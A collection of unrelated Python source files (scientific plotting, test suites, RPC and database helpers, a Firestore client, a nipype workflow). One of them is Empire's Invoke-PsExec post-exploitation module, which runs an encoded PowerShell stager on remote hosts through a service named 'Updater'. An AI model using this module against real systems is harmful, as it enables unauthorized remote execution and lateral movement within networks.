ReconnectionTimer.__init__(self)
self.__seed = 1
def wait(self):
        waitingTime = ((1 + (1 / self.__seed)) ** self.__seed) * (1 + math.log10(self.__seed))
if waitingTime < 0:
waitingTime = 0
sleep(waitingTime)
self.__seed += 1
def reset(self):
self.__seed = 1
    ## Converts the instance to a string
def __str__(self):
return "Logarithmic Reconnection Timer, seed: %s" % self.__seed
## Defines a reconnection timer in which the waiting time between one cycle
# and the next is constant.
class ConstantReconnectionTimer(ReconnectionTimer):
def __init__(self, waiting_time=5):
ReconnectionTimer.__init__(self)
self.__waiting_time = waiting_time
def wait(self):
sleep(self.__waiting_time)
def reset(self):
pass
    ## Converts the instance to a string
def __str__(self):
return "Constant Reconnection Timer, seed: %s" % self.__waiting_time
|
qbuat/rootpy
|
examples/stats/plot_quantiles.py
|
Python
|
gpl-3.0
| 1,944
| 0.002058
|
#!/usr/bin/env python
"""
=================================================
Draw a Quantile-Quantile Plot and Confidence Band
=================================================
This is an example of drawing a quantile-quantile plot with a confidence level
(CL) band.
"""
print __doc__
import ROOT
from rootpy.interactive import wait
from rootpy.plotting import Hist, Canvas, Legend, set_style
from rootpy.plotting.contrib.quantiles import qqgraph
set_style('ATLAS')
c = Canvas(width=1200, height=600)
c.Divide(2, 1, 1e-3, 1e-3)
rand = ROOT.TRandom3()
h1 = Hist(100, -5, 5, name="h1", title="Histogram 1",
linecolor='red', legendstyle='l')
h2 = Hist(100, -5, 5, name="h2", title="Histogram 2",
linecolor='blue', legendstyle='l')
for ievt in xrange(10000):
h1.Fill(rand.Gaus(0, 0.8))
h2.Fill(rand.Gaus(0, 1))
pad = c.cd(1)
h1.Draw('hist')
h2.Draw('hist same')
leg = Legend([h1, h2], pad=pad, leftmargin=0.5,
             topmargin=0.11, rightmargin=0.05,
textsize=20)
leg.Draw()
pad = c.cd(2)
gr = qqgraph(h1, h2)
gr.xaxis.title = h1.title
gr.yaxis.title = h2.title
gr.fillcolor = 17
gr.fillstyle = 'solid'
gr.linecolor = 17
gr.markercolor = 'darkred'
gr.markerstyle = 20
gr.title = "QQ with CL"
gr.Draw("ap")
x_min = gr.GetXaxis().GetXmin()
x_max = gr.GetXaxis().GetXmax()
y_min = gr.GetXaxis().GetXmin()
y_max = gr.GetXaxis().GetXmax()
gr.Draw('a3')
gr.Draw('Xp same')
# a straight line y=x to be a reference
f_dia = ROOT.TF1("f_dia", "x",
h1.GetXaxis().GetXmin(),
h1.GetXaxis().GetXmax())
f_dia.SetLineColor(9)
f_dia.SetLineWidth(2)
f_dia.SetLineStyle(2)
f_dia.Draw("same")
leg = Legend(3, pad=pad, leftmargin=0.45,
topmargin=0.45, rightmargin=0.05,
textsize=20)
leg.AddEntry(gr, "QQ points", "p")
leg.AddEntry(gr, "68% CL band", "f")
leg.AddEntry(f_dia, "Diagonal line", "l")
leg.Draw()
c.Modified()
c.Update()
c.Draw()
wait()
|
thebarbershopper/Empire
|
lib/modules/lateral_movement/invoke_psexec.py
|
Python
|
bsd-3-clause
| 5,198
| 0.012697
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PsExec',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PsExec type functionality.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/rapid7/metasploit-framework/blob/master/tools/psexec.rb'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : 'The name of the service to create.',
'Required' : True,
'Value' : 'Updater'
},
'Command' : {
'Description' : 'Custom command to execute on remote hosts.',
'Required' : False,
'Value' : ''
},
'ResultFile' : {
'Description' : 'Name of the file to write the results to on agent machine.',
'Required' : False,
'Value' : ''
},
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
serviceName = self.options['ServiceName']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
command = self.options['Command']['Value']
resultFile = self.options['ResultFile']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if command != "":
# executing a custom command on the remote machine
return ""
# if
else:
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
return script
|
mandawilson/cbioportal
|
core/src/test/scripts/system_tests_validate_data.py
|
Python
|
agpl-3.0
| 11,621
| 0.001807
|
#!/usr/bin/env python3
'''
Copyright (c) 2016 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
'''
import unittest
import logging
import tempfile
import os
import shutil
import time
import difflib
from importer import validateData
try:
WindowsError
except NameError:
WindowsError = None
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
class ValidateDataSystemTester(unittest.TestCase):
'''Test cases around running the complete validateData script
(such as "does it return the correct exit status?" or "does it generate
the html report when requested?", etc)
'''
def setUp(self):
_resetClassVars()
# Prepare global variables related to sample profiled for mutations and gene panels
self.mutation_sample_ids = None
self.mutation_file_sample_ids = set()
self.fusion_file_sample_ids = set()
def tearDown(self):
"""Close logging handlers after running validator and remove tmpdir."""
# restore original function
validateData.mutation_sample_ids = None
validateData.mutation_file_sample_ids = set()
validateData.fusion_file_sample_ids = set()
# get the logger used in validateData.main_validate()
validator_logger = logging.getLogger(validateData.__name__)
# flush and close all handlers of this logger
for logging_handler in validator_logger.handlers:
logging_handler.close()
# remove the handlers from the logger to reset it
validator_logger.handlers = []
super(ValidateDataSystemTester, self).tearDown()
def assertFileGenerated(self, tmp_file_name, expected_file_name):
"""Assert that a file has been generated with the expected contents."""
self.assertTrue(os.path.exists(tmp_file_name))
with open(tmp_file_name, 'r') as out_file, \
open(expected_file_name, 'r') as ref_file:
base_filename = os.path.basename(tmp_file_name)
diff_result = difflib.context_diff(
ref_file.readlines(),
out_file.readlines(),
fromfile='Expected {}'.format(base_filename),
tofile='Generated {}'.format(base_filename))
diff_line_list = list(diff_result)
self.assertEqual(diff_line_list, [],
msg='\n' + ''.join(diff_line_list))
# remove temp file if all is fine:
try:
os.remove(tmp_file_name)
except WindowsError:
# ignore this Windows specific error...probably happens because of virus scanners scanning the temp file...
pass
def test_exit_status_success(self):
'''study 0 : no errors, expected exit_status = 0.
If there are errors, the script should return
0: 'succeeded',
1: 'failed',
2: 'not performed as problems occurred',
3: 'succeeded with warnings'
'''
# build up the argument list
print("===study 0")
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
'''study 1 : errors, expected exit_status = 1.'''
#Build up arguments and run
print("===study 1")
args = ['--study_directory', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
'''test to fail: give wrong hugo file, or let a meta file point to a non-existing data file, expected exit_status = 2.'''
#Build up arguments and run
print("===study invalid")
args = ['--study_directory', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(2, exit_status)
def test_exit_status_warnings(self):
'''study 3 : warnings only, expected exit_status = 3.'''
# data_filename: test
#Build up arguments and run
print("===study 3")
args = ['--study_directory', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(3, exit_status)
def test_html_output(self):
'''
Test if html file is correctly generated when 'html_table' is given
'''
#Build up arguments and run
out_file_name = 'test_data/study_es_0/result_report.html~'
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
|
args = validateData.interface(args)
        # Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_es_0/result_report.html')
def test_portal_mismatch(self):
'''Test if validation fails when data contradicts the portal.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--portal_info_dir', PORTAL_INFO_DIR, '--verbose']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 1)
def test_no_portal_checks(self):
'''Test if validation skips portal-specific checks when instructed.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--verbose',
'--no_portal_checks']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 3)
def test_problem_in_clinical(self):
'''Test whether the script aborts if the sample file cannot be parsed.
Further files cannot be validated in this case, as all sample IDs will
be undefined. Validate if the script is giving the proper error.
'''
# build the argument list
out_file_name = 'test_data/study_wr_clin/result_report.html~'
print('==test_problem_in_clinical==')
args = ['--study_directory', 'test_data/study_wr_clin/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
# TODO - set logger in main_validate and rea
|
nooperpudd/pulsar
|
examples/calculator/tests.py
|
Python
|
bsd-3-clause
| 9,018
| 0.000887
|
'''Tests the RPC "calculator" example.'''
import unittest
import types
from pulsar import send
from pulsar.apps import rpc, http
from pulsar.apps.test import dont_run_with_thread
from .manage import server, Root, Calculator
class TestRpcOnThread(unittest.TestCase):
app_cfg = None
concurrency = 'thread'
# used for both keep-alive and timeout in JsonProxy
    # long enough to allow waiting for tasks
rpc_timeout = 500
@classmethod
def setUpClass(cls):
name = 'calc_' + cls.concurrency
s = server(bind='127.0.0.1:0', name=name, concurrency=cls.concurrency)
cls.app_cfg = yield from send('arbiter', 'run', s)
cls.uri = 'http://{0}:{1}'.format(*cls.app_cfg.addresses[0])
cls.p = rpc.JsonProxy(cls.uri, timeout=cls.rpc_timeout)
@classmethod
def tearDownClass(cls):
if cls.app_cfg:
return send('arbiter', 'kill_actor', cls.app_cfg.name)
def setUp(self):
self.assertEqual(self.p.url, self.uri)
self.assertTrue(str(self.p))
proxy = self.p.bla
self.assertEqual(proxy.name, 'bla')
self.assertEqual(proxy.url, self.uri)
self.assertEqual(proxy._client, self.p)
self.assertEqual(str(proxy), 'bla')
def test_wsgi_handler(self):
cfg = self.app_cfg
self.assertTrue(cfg.callable)
wsgi_handler = cfg.callable.setup({})
self.assertEqual(len(wsgi_handler.middleware), 2)
router = wsgi_handler.middleware[1]
self.assertEqual(router.route.path, '/')
root = router.post
self.assertEqual(len(root.subHandlers), 1)
hnd = root.subHandlers['calc']
self.assertFalse(hnd.isroot())
self.assertEqual(hnd.subHandlers, {})
# Pulsar server commands
def test_ping(self):
response = yield from self.p.ping()
self.assertEqual(response, 'pong')
def test_functions_list(self):
result = yield from self.p.functions_list()
self.assertTrue(result)
d = dict(result)
self.assertTrue('ping' in d)
self.assertTrue('echo' in d)
self.assertTrue('functions_list' in d)
self.assertTrue('calc.add' in d)
self.assertTrue('calc.divide' in d)
def test_time_it(self):
'''Ping server 5 times'''
bench = yield from self.p.timeit('ping', 5)
self.assertTrue(len(bench.result), 5)
self.assertTrue(bench.taken)
# Test Object method
def test_check_request(self):
result = yield from self.p.check_request('check_request')
self.assertTrue(result)
def test_add(self):
response = yield from self.p.calc.add(3, 7)
self.assertEqual(response, 10)
def test_subtract(self):
response = yield from self.p.calc.subtract(546, 46)
self.assertEqual(response, 500)
def test_multiply(self):
response = yield from self.p.calc.multiply(3, 9)
self.assertEqual(response, 27)
def test_divide(self):
response = yield from self.p.calc.divide(50, 25)
self.assertEqual(response, 2)
def test_info(self):
response = yield from self.p.server_info()
self.assertTrue('server' in response)
server = response['server']
self.assertTrue('version' in server)
app = response['monitors'][self.app_cfg.name]
if self.concurrency == 'thread':
self.assertFalse(app['workers'])
worker = app
else:
workers = app['workers']
self.assertEqual(len(workers), 1)
worker = workers[0]
name = '%sserver' % self.app_cfg.name
if name in worker:
self._check_tcpserver(worker[name]['server'])
def _check_tcpserver(self, server):
sockets = server['sockets']
if sockets:
self.assertEqual(len(sockets), 1)
sock = sockets[0]
self.assertEqual(sock['address'],
'%s:%s' % self.app_cfg.addresses[0])
def test_invalid_params(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.add,
50, 25, 67)
def test_invalid_params_fromApi(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.divide,
50, 25, 67)
def test_invalid_function(self):
p = self.p
yield from self.async.assertRaises(rpc.NoSuchFunction, p.foo, 'ciao')
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo.sjdcbjcb)
def testInternalError(self):
return self.async.assertRaises(rpc.InternalError, self.p.calc.divide,
'ciao', 'bo')
def testCouldNotserialize(self):
return self.async.assertRaises(rpc.InternalError, self.p.dodgy_method)
def testpaths(self):
        '''Fetch a sizable amount of data'''
response = yield from self.p.calc.randompaths(num_paths=20, size=100,
mu=1, sigma=2)
self.assertTrue(response)
def test_echo(self):
response = yield from self.p.echo('testing echo')
self.assertEqual(response, 'testing echo')
def test_docs(self):
handler = Root({'calc': Calculator})
self.assertEqual(handler.parent, None)
self.assertEqual(handler.root, handler)
self.assertRaises(rpc.NoSuchFunction, handler.get_handler,
'cdscsdcscd')
calc = handler.subHandlers['calc']
self.assertEqual(calc.parent, handler)
self.assertEqual(calc.root, handler)
docs = handler.docs()
self.assertTrue(docs)
response = yield from self.p.documentation()
self.assertEqual(response, docs)
def test_batch_one_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
def test_batch_few_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
call_id2 = bp.calc.add(1, 1)
self.assertIsNotNone(call_id2)
self.assertEqual(len(bp), 2)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
        for ind, batch_response in enumerate(batch_generator):
            self.assertIn(ind, (0, 1))
if call_id1 == batch_response.id:
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
elif call_id2 == batch_response.id:
self.assertEqual(batch_response.result, 2)
self.assertIsNone(batch_response.exception)
def test_batch_error_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping('wrong param')
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertIs
|
Jeff-Tian/mybnb
|
Python27/Lib/bsddb/test/test_all.py
|
Python
|
apache-2.0
| 19,765
| 0.011131
|
"""Run all test cases.
"""
import sys
import os
import unittest
try:
# For Pythons w/distutils pybsddb
import bsddb3 as bsddb
except ImportError:
# For Python 2.3
import bsddb
if sys.version_info[0] >= 3 :
charset = "iso8859-1" # Full 8 bit
class logcursor_py3k(object) :
def __init__(self, env) :
self._logcursor = env.log_cursor()
def __getattr__(self, v) :
return getattr(self._logcursor, v)
def __next__(self) :
v = getattr(self._logcursor, "next")()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
next = __next__
def first(self) :
v = self._logcursor.first()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def last(self) :
v = self._logcursor.last()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def prev(self) :
v = self._logcursor.prev()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def current(self) :
v = self._logcursor.current()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def set(self, lsn) :
v = self._logcursor.set(lsn)
if v is not None :
v = (v[0], v[1].decode(charset))
return v
class cursor_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._dbcursor = db.cursor(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbcursor, v)
def _fix(self, v) :
if v is None : return None
key, value = v
if isinstance(key, bytes) :
key = key.decode(charset)
return (key, value.decode(charset))
def __next__(self) :
            v = getattr(self._dbcursor, "next")()
return self._fix(v)
next = __next__
def previous(self) :
v = self._dbcursor.previous()
return self._fix(v)
def last(self) :
v = self._dbcursor.last()
return self._fix(v)
def set(self, k) :
            if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set(k)
return self._fix(v)
def set_recno(self, num) :
v = self._dbcursor.set_recno(num)
return self._fix(v)
def set_range(self, k, dlen=-1, doff=-1) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set_range(k, dlen=dlen, doff=doff)
return self._fix(v)
def dup(self, flags=0) :
cursor = self._dbcursor.dup(flags)
return dup_cursor_py3k(cursor)
def next_dup(self) :
v = self._dbcursor.next_dup()
return self._fix(v)
def next_nodup(self) :
v = self._dbcursor.next_nodup()
return self._fix(v)
def put(self, key, data, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
                data = bytes(data, charset)
return self._dbcursor.put(key, data, flags=flags, dlen=dlen,
doff=doff)
def current(self, flags=0, dlen=-1, doff=-1) :
v = self._dbcursor.current(flags=flags, dlen=dlen, doff=doff)
return self._fix(v)
def first(self) :
v = self._dbcursor.first()
return self._fix(v)
def pget(self, key=None, data=None, flags=0) :
# Incorrect because key can be a bare number,
# but enough to pass testsuite
if isinstance(key, int) and (data is None) and (flags == 0) :
flags = key
key = None
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, int) and (flags==0) :
flags = data
data = None
if isinstance(data, str) :
data = bytes(data, charset)
v=self._dbcursor.pget(key=key, data=data, flags=flags)
if v is not None :
v1, v2, v3 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
if isinstance(v2, bytes) :
v2 = v2.decode(charset)
v = (v1, v2, v3.decode(charset))
return v
def join_item(self) :
v = self._dbcursor.join_item()
if v is not None :
v = v.decode(charset)
return v
def get(self, *args, **kwargs) :
l = len(args)
if l == 2 :
k, f = args
if isinstance(k, str) :
k = bytes(k, "iso8859-1")
args = (k, f)
elif l == 3 :
k, d, f = args
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(d, str) :
d = bytes(d, charset)
args =(k, d, f)
v = self._dbcursor.get(*args, **kwargs)
if v is not None :
k, v = v
if isinstance(k, bytes) :
k = k.decode(charset)
v = (k, v.decode(charset))
return v
def get_both(self, key, value) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._dbcursor.get_both(key, value)
return self._fix(v)
class dup_cursor_py3k(cursor_py3k) :
def __init__(self, dbcursor) :
self._dbcursor = dbcursor
class DB_py3k(object) :
def __init__(self, *args, **kwargs) :
args2=[]
for i in args :
if isinstance(i, DBEnv_py3k) :
i = i._dbenv
args2.append(i)
args = tuple(args2)
for k, v in kwargs.items() :
if isinstance(v, DBEnv_py3k) :
kwargs[k] = v._dbenv
self._db = bsddb._db.DB_orig(*args, **kwargs)
def __contains__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
return getattr(self._db, "has_key")(k)
def __getitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._db[k]
if v is not None :
v = v.decode(charset)
return v
def __setitem__(self, k, v) :
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(v, str) :
v = bytes(v, charset)
self._db[k] = v
def __delitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
del self._db[k]
def __getattr__(self, v) :
return getattr(self._db, v)
def __len__(self) :
return len(self._db)
def has_key(self, k, txn=None) :
if isinstance(k, str) :
k = bytes(k, charset)
return self._db.has_key(k, txn=txn)
def set_re_delim(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_delim(c)
def set_re_pad(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_pad(c)
def get_re_source(self) :
|
huyx/icall
|
setup.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
# -*- coding: utf-8 -*-
from distutils.core import setup
import os.path
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
"Operating System :: OS Independent",
"Topic :: S
|
oftware Development :: Li
|
braries :: Python Modules",
]
def read(fname):
fname = os.path.join(os.path.dirname(__file__), fname)
return open(fname).read().strip()
def read_files(*fnames):
return '\r\n\r\n\r\n'.join(map(read, fnames))
setup(
name = 'icall',
version = '0.3.4',
py_modules = ['icall'],
description = 'Parameters call function, :-)',
long_description = read_files('README.rst', 'CHANGES.rst'),
author = 'huyx',
author_email = 'ycyuxin@gmail.com',
url = 'https://github.com/huyx/icall',
keywords = ['functools', 'function', 'call'],
classifiers = classifiers,
)
|
GoogleCloudPlatform/grpc-gcp-python
|
firestore/examples/end2end/src/Write.py
|
Python
|
apache-2.0
| 2,967
| 0.013482
|
#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess
from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc
from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2
def first_message(database, write):
messages = [
firestore_pb2.WriteRequest(database = database, writes = [])
]
for msg in messages:
|
yield msg
def generate_messages(database, writes, stream_id, stream_token):
    # writes can be a list appended to the messages, so multiple Write messages can be sent;
    # here we send just one as an example
messages = [
firestore_pb2.WriteRequest(database=database, writes = []),
        firestore_pb2.WriteRequest(database=database, writes = [writes], stream_id = stream_id, stream_token = stream_token)
]
for msg in messages:
yield msg
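# Illustrative sketch (not part of the original example): to send several writes in a
# single request, build extra Write messages with the same constructors used in main()
# and pass them all in the `writes` list, e.g.
#   extra_value = document_pb2.Value(string_value="bar")
#   extra_write = write_pb2.Write(
#       update_mask=common_pb2.DocumentMask(field_paths=["bar"]),
#       update=document_pb2.Document(name=name, fields={"bar": extra_value}))
#   firestore_pb2.WriteRequest(database=database, writes=[writes, extra_write],
#                              stream_id=stream_id, stream_token=stream_token)
# where `name`, `writes`, `stream_id` and `stream_token` are the values already
# available in main() and the write loop.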
def main():
fl = os.path.dirname(os.path.abspath(__file__))
fn = os.path.join(fl, 'grpc.json')
with open(fn) as grpc_file:
item = json.load(grpc_file)
creds = item["grpc"]["Write"]["credentials"]
credentials = service_account.Credentials.from_service_account_file("{}".format(creds))
scoped_credentials = credentials.with_scopes(['https://www.googleapis.com/auth/datastore'])
http_request = google.auth.transport.requests.Request()
channel = google.auth.transport.grpc.secure_authorized_channel(scoped_credentials, http_request, 'firestore.googleapis.com:443')
stub = firestore_pb2_grpc.FirestoreStub(channel)
database = item["grpc"]["Write"]["database"]
name = item["grpc"]["Write"]["name"]
first_write = write_pb2.Write()
responses = stub.Write(first_message(database, first_write))
for response in responses:
print("Received message %s" % (response.stream_id))
print(response.stream_token)
value_ = document_pb2.Value(string_value = "foo_boo")
update = document_pb2.Document(name=name, fields={"foo":value_})
writes = write_pb2.Write(update_mask=common_pb2.DocumentMask(field_paths = ["foo"]), update=update)
r2 = stub.Write(generate_messages(database, writes, response.stream_id, response.stream_token))
for r in r2:
print(r.write_results)
if __name__ == "__main__":
main()
|
autodefrost/sandbox
|
python/test_rel_import/package1/subpackage2/module1h.py
|
Python
|
apache-2.0
| 88
| 0.011364
|
from ..subpackage1 import module1g
def func1h():
print('1h')
    module1g.func1g()
|
|
astraw/PyUniversalLibrary
|
examples/ulai01.py
|
Python
|
bsd-3-clause
| 1,869
| 0
|
# Copyright (c) 2005, California Institute of Technology
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#     * Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Author: Andrew Straw
import UniversalLibrary as UL
BoardNum = 0
Gain = UL.BIP5VOLTS
Chan = 0
while 1:
DataValue = UL.cbAIn(BoardNum, Chan, Gain)
EngUnits = UL.cbToEngUnits(BoardNum, Gain, DataValue)
print DataValue, EngUnits
|
carlohamalainen/volgenmodel-nipype
|
new_data_to_atlas_space.py
|
Python
|
bsd-3-clause
| 4,566
| 0
|
#!/usr/bin/env python3
import os
import os.path
from nipype.interfaces.utility import IdentityInterface, Function
from nipype.interfaces.io import SelectFiles, DataSink, DataGrabber
from nipype.pipeline.engine import Workflow, Node, MapNode
from nipype.interfaces.minc import Resample, BigAverage, VolSymm
import argparse
def create_workflow(
xfm_dir,
xfm_pattern,
atlas_dir,
atlas_pattern,
source_dir,
source_pattern,
work_dir,
out_dir,
name="new_data_to_atlas_space"
):
wf = Workflow(name=name)
wf.base_dir = os.path.join(work_dir)
datasource_source = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_source'
)
datasource_source.inputs.base_directory = os.path.abspath(source_dir)
datasource_source.inputs.template = source_pattern
datasource_xfm = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_xfm'
)
datasource_xfm.inputs.base_directory = os.path.abspath(xfm_dir)
